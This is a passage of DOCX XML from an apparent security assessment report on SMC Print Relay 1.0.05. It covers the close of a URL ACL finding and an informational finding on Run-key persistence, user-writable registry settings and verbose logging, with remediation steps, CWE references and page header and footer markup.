        </w:rPr>
        <w:t>Continue binding only to 127.0.0.1 and document the intended listener model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699443E0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) no urlacl entry grants Everyone; (2) the service still starts and listens on 127.0.0.1 only (netsh http show urlacl).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCD82A" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="39FDC3C3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BD718" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-732: Incorrect Permission Assignment for Critical Resource — cwe.mitre.org/data/definitions/732.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387A9F5" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>UrlPrefix / URL ACL reservations — learn.microsoft.com/windows/win32/http/add-urlacl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568FE79B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-180" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="C00000"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7200"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C1336" w14:paraId="4D72424B" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B509B6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="24" w:name="_Toc9000010"/>
            <w:bookmarkStart w:id="25" w:name="_Toc232079920"/>
            <w:r>
              <w:t>11. Local Persistence and Configuration Hygiene - Info</w:t>
            </w:r>
            <w:bookmarkEnd w:id="24"/>
            <w:bookmarkEnd w:id="25"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="538135" w:themeFill="accent6" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6142743D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="336613EF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1785BF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Rating: </w:t>
      </w:r>
      <w:r>
        <w:t>Informational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772ECFF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected components: </w:t>
      </w:r>
      <w:r>
        <w:t>Run-key autostart, registry-sourced settings, application logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFAA8D0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The relay registers itself for automatic startup via the Windows Run key, and with the shipped default SecureVersion=False it reads its autostart entry and configuration from the per-user (HKCU) hive, which is writable by the logged-in standard user. The listening port is likewise sourced from user-writable settings. Verbose logging is enabled by default (EnableLog=True). None of these is directly exploitable for privilege escalation, but collectively they widen local tamperability and create the possibility of sensitive data appearing in log files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612AF38D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE46B5" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Configuration defaults (exe.config userSettings) and registry selection (decompiled Utils.getRegistryKey):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B6977" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C89E0A8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RunAtStartup = True   SecureVersion = False   EnableLog = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C727C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>getRegistryKey(): SecureVersion ? HKLM\...\CurrentVersion\Run : HKCU\...\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140D6A4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppSettingsLoader.Load(): Port read from registry (user-writable when SecureVersion=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F771204" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FB0563" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A69F4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: tighten persistence and configuration hygiene so settings and logs cannot be abused or leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F77F3" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Protect configuration and persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F99BF6" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Where feasible, store autostart and configuration under a machine-protected location (HKLM with administrator-only ACLs) and ship a secure default for SecureVersion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E121C8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Review log contents and retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9C156" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Ensure logs exclude PHI and secrets, are access-controlled, and are rotated/retained per policy; confirm the existing log-purge behavior meets requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DAC541" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) configuration keys are not user-writable; (2) SecureVersion defaults to the hardened value; (3) sample logs contain no PHI or secrets and rotate as required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE0D41" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="01DF4AC3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43CDA4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-276: Incorrect Default Permissions — cwe.mitre.org/data/definitions/276.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34EC44" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CWE-532: Insertion of Sensitive Information into Log File — cwe.mitre.org/data/definitions/532.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B58B576" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353631A8" w14:textId="77777777" w:rsidR="007F3917" w:rsidRDefault="007F3917" w:rsidP="007F3917">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1BBFF0" w14:textId="77777777" w:rsidR="007F3917" w:rsidRDefault="007F3917" w:rsidP="00741759">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007F3917" w:rsidSect="00071833">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="default" r:id="rId25"/>
      <w:headerReference w:type="first" r:id="rId2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4E89" w14:textId="77777777" w:rsidR="00751205" w:rsidRDefault="00751205" w:rsidP="004D5A83">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60FECB67" w14:textId="77777777" w:rsidR="00751205" w:rsidRDefault="00751205" w:rsidP="004D5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charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="WenQuanYi Micro Hei">
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
  </w:font>
  <w:font w:name="Lohit Hind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0E23" w14:textId="77777777" w:rsidR="00DC6C29" w:rsidRDefault="00DC6C29">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658239" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40209645" wp14:editId="3D31AEAE">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-984250</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>53975</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7892415" cy="647700"/>
              <wp:effectExtent l="19050" t="19050" r="32385" b="38100"/>
              <wp:wrapNone/>
              <wp:docPr id="12" name="Rectangle 12"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="7892415" cy="647700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="C00000"/>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C32E8" id="Rectangle 12" o:spid="_x0000_s1026" style="position:absolute;margin-left:-77.5pt;margin-top:4.25pt;width:621.45pt;height:51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2VChowIAALkFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X2wHSdMGdYogRYYB RVu0HXpWZCk2IIuapMTJfv0o+ZH0gR2G5aCIJvmR/ETy+uZQK7IX1lWgc5qNUkqE5lBUepvTny/r b5eUOM90wRRokdOjcPRm8fXLdWPmYgwlqEJYgiDazRuT09J7M08Sx0tRMzcCIzQqJdiaeRTtNiks axC9Vsk4TS+SBmxhLHDhHH69bZV0EfGlFNw/SOmEJyqnmJuPp43nJpzJ4prNt5aZsuJdGuwfsqhZ pTHoAHXLPCM7W32AqituwYH0Iw51AlJWXMQasJosfVfNc8mMiLUgOc4MNLn/B8vv94+WVAW+3ZgS zWp8oydkjemtEgS/IUGNcXO0ezaPtpMcXkO1B2nr8I91kEMk9TiQKg6ecPw4u7waT7IpJRx1F5PZ LI2sJydvY53/LqAm4ZJTi+Ejl2x/5zxGRNPeJARzoKpiXSkVBbvdrJQle4YPvErDL6SMLm/MlCZN TqezbJpG6DfK2GxiQPGH7CMEAiqNuIGLtvp480clQhpKPwmJNGK94zZAaOATJuNcaJ+1qpIVok14 ep5v7xGzj4ABWWKhA3YH0Fu2ID12W3ZnH1xF7P/Buav8b86DR4wM2g/OdaXBflaZwqq6yK19T1JL TWBpA8URm8xCO33O8HWFL33HnH9kFscNBxNXiH/AQyrAh4LuRkkJ9vdn34M9TgFqKWlwfHPqfu2Y FZSoHxrn4yqbTMK8R2EynY1RsOeazblG7+oVYANluKwMj9dg71V/lRbqV9w0yxAVVUxzjJ1T7m0v rHy7VnBXcbFcRjOcccP8nX42PIAHVkMnvxxemTVdu3sclHvoR53N33V9axs8NSx3HmQVR+LEa8c3 7ofYON0uCwvoXI5Wp427+AMAAP//AwBQSwMEFAAGAAgAAAAhAL2IajHhAAAACwEAAA8AAABkcnMv ZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNxaOyCXNMSpUBGgHkCiUPXqxEsSYa+j2G3D3+Oe4Dar Gc2+KVeTs+yIY+g9KcjmAhhS401PrYLPj6dZDixETUZbT6jgBwOsqsuLUhfGn+gdj9vYslRCodAK uhiHgvPQdOh0mPsBKXlffnQ6pnNsuRn1KZU7y2+EWHCne0ofOj3gusPme3twCsLiTe/2r37/uK6l 3dza4Tl72Sh1fTU93AOLOMW/MJzxEzpUian2BzKBWQWzTMo0JirIJbBzQOR3S2B1UpmQwKuS/99Q /QIAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAB2VChowIAALkFAAAOAAAAAAAAAAAAAAAA AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC9iGox4QAAAAsBAAAPAAAAAAAAAAAA AAAAAP0EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACwYAAAAA " fillcolor="#c00000" strokecolor="black [3213]" strokeweight="4.5pt"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36072C58" wp14:editId="4C3CEB5C">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>6127750</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>223520</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="295275"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85750"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525">
                        <a:noFill/>
                        <a:miter lim="800000"/>
                        <a:headEnd/>
                        <a:tailEnd/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="47C653BE"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072C58" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:482.5pt;margin-top:17.6pt;width:23.2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" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="47C653BE" w14:textId="77777777" w:rsidR="00DC6C29" w:rsidRPr="006B3A24" w:rsidRDefault="00DC6C29" w:rsidP="006B3A24">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:cs="Open Sans"/>
                        <w:b/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="006B3A24">
                      <w:rPr>
                        <w:rFonts w:cs="Open Sans"/>
                        <w:b/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r w:rsidRPr="006B3A24">
                      <w:rPr>
                        <w:rFonts w:cs="Open Sans"/>
                        <w:b/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      </w:rPr>
                      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
                    </w:r>
                    <w:r w:rsidRPr="006B3A24">
                      <w:rPr>
                        <w:rFonts w:cs="Open Sans"/>
                        <w:b/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r w:rsidRPr="006B3A24">
                      <w:rPr>
                        <w:rFonts w:cs="Open Sans"/>
                        <w:b/>
                        <w:noProof/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      </w:rPr>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r w:rsidRPr="006B3A24">
                      <w:rPr>
                        <w:rFonts w:cs="Open Sans"/>
                        <w:b/>
                        <w:noProof/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>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B7E9" w14:textId="77777777" w:rsidR="00751205" w:rsidRDefault="00751205" w:rsidP="004D5A83">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B9E6386" w14:textId="77777777" w:rsidR="00751205" w:rsidRDefault="00751205" w:rsidP="004D5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4084" w14:textId="77777777" w:rsidR="00DC6C29" w:rsidRPr="00472CB8" w:rsidRDefault="00DC6C29" w:rsidP="004953A0">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="8838"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:cs="Open Sans"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00472CB8">
      <w:rPr>
        <w:rFonts w:cs="Open Sans"/>
        <w:b/>
        <w:noProof/>
        <w:lang w:eastAsia="es-MX"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44D112CE" wp14:editId="19E76919">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:align>right</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:align>top</wp:align>
          </wp:positionV>
          <wp:extent cx="7771765" cy="947420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inside-01.jpg"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill rotWithShape="1">
                  <a:blip r:embed="rId1" cstate="print">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:srcRect b="5803"/>
                  <a:stretch/>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7771765" cy="947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CB8">
      <w:rPr>
        <w:rFonts w:cs="Open Sans"/>
        <w:b/>
        <w:i/>
        <w:noProof/>
        <w:color w:val="3B3838" w:themeColor="background2" w:themeShade="40"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48F78AF1" wp14:editId="5B9A0E39">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-64135</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="897038" cy="0"/>
              <wp:effectExtent l="0" t="19050" r="36830" b="19050"/>
              <wp:wrapNone/>
              <wp:docPr id="11" name="Straight Connector 11"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm flipV="1">
                        <a:off x="0" y="0"/>
                        <a:ext cx="897038" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:ln w="38100">
                        <a:solidFill>
                          <a:srgbClr val="EC1C2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D4EFE"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05pt" to="70.65pt,-5.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ngX6AEAABkEAAAOAAAAZHJzL2Uyb0RvYy54bWysU02P0zAQvSPxHyzfaZIughI13UOW5YKg YmHvrmMnlvylsWnSf8/YScMC2gOIi2V75r2Z9zze305Gk7OAoJxtaLUpKRGWu07ZvqHfvt6/2lES IrMd086Khl5EoLeHly/2o6/F1g1OdwIIkthQj76hQ4y+LorAB2FY2DgvLAalA8MiHqEvOmAjshtd bMvyTTE66Dw4LkLA27s5SA+ZX0rB42cpg4hENxR7i3mFvJ7SWhz2rO6B+UHxpQ32D10YpiwWXanu WGTkO6g/qIzi4IKTccOdKZyUiousAdVU5W9qHgbmRdaC5gS/2hT+Hy3/dD4CUR2+XUWJZQbf6CEC U/0QSeusRQcdEAyiU6MPNQJae4TlFPwRkuxJgiFSK/+IRNkIlEam7PNl9VlMkXC83L17W97gYPBr qJgZEpOHED8IZ0jaNFQrmxxgNTt/DBGrYuo1JV1rS8aG3uyqssxpwWnV3SutUzBAf2o1kDPD13/f Vu32dZKBFE/S8KQtXiZxs5y8ixct5gJfhESDsO1ZWB5NsdIyzoWN2Z7MhNkJJrGFFbi0lmb6OeCS n6Aij+3fgFdEruxsXMFGWQezMb9Wj9O1ZTnnXx2YdScLTq675IfO1uD8ZeeWv5IG/Ok5w3/+6MMP AAAA//8DAFBLAwQUAAYACAAAACEAjigr+t4AAAAIAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwWrC QBCG74W+wzKFXopuYmrRmI0UofQgOWg96G3MjklodjZkV03fvisU6nHmH775/mw5mFZcqHeNZQXx OAJBXFrdcKVg9/UxmoFwHllja5kU/JCDZf74kGGq7ZU3dNn6SgQIuxQV1N53qZSurMmgG9uOOGQn 2xv0YewrqXu8Brhp5SSK3qTBhsOHGjta1VR+b88mUA6fyXRti/UEiyZZzffFy2w3V+r5aXhfgPA0 +P9juOkHdciD09GeWTvRKghFvIJRHMUgbvFrnIA4/m1knsn7AvkvAAAA//8DAFBLAQItABQABgAI AAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsB Ai0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsB Ai0AFAAGAAgAAAAhAH5meBfoAQAAGQQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1s UEsBAi0AFAAGAAgAAAAhAI4oK/reAAAACAEAAA8AAAAAAAAAAAAAAAAAQgQAAGRycy9kb3ducmV2 LnhtbFBLBQYAAAAABAAEAPMAAABNBQAAAAA= " strokecolor="#ec1c24" strokeweight="3pt">
              <v:stroke joinstyle="miter"/>
            </v:line>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00281EA3" w:rsidRPr="00281EA3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00281EA3" w:rsidRPr="00281EA3">
      <w:rPr>
        <w:rFonts w:cs="Open Sans"/>
        <w:b/>
        <w:noProof/>
        <w:lang w:eastAsia="es-MX"/>
      </w:rPr>
      <w:t>SMC Print Relay (1.0.05)</w:t>
    </w:r>
    <w:r w:rsidR="00281EA3">
      <w:rPr>
        <w:rFonts w:cs="Open Sans"/>
        <w:b/>
        <w:noProof/>
        <w:lang w:eastAsia="es-MX"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00472CB8">
      <w:rPr>
        <w:rFonts w:cs="Open Sans"/>
        <w:b/>
        <w:noProof/>
        <w:lang w:eastAsia="es-MX"/>
      </w:rPr>
      <w:t xml:space="preserve">– </w:t>
